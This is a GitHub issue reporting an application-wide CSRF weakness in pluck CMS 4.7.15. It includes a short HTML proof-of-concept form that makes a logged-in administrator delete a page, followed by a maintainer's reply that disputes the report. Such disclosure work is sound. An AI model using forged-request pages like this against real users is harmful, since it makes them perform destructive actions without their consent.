pluck-cms / pluck

Central repo for pluck cms

Home Page:http://www.pluck-cms.org

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CSRF Application Wide

devansh3008 opened this issue · comments

I have found multiple CSRF Issues on following version: 4.7.15

There is no use of Anticrsf token and Same site cookie being used. All endpoints are vulnerable even 4.7.16-dev4.

Only user needs to be logged in (no password is required to perform this issue)

exploit
page_delete
pluck-1
pluck-2
pluck-3
pluck-4
pluck-cms-4 7 16
POC-1

Valid POC: (exploit.html)

<html><head>
<title>CSRF PoC - Generated By AppSec Labs csrf-generator</title>
</head><body>
<form action="http://localhost/admin.php?action=deletepage&var1=csrf" method="GET">
<input type="text" name="action" value="deletepage" /><br />
<input type="text" name="var1" value="csrf" /><br />
<input type='submit' value='Go!' />
</form>
</body>
</html>

Click on this html page and you can see you delete page/trashcan objects. The issue is being reported by me on huntr.io. I am adding this as reference for you to go over the images.

This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.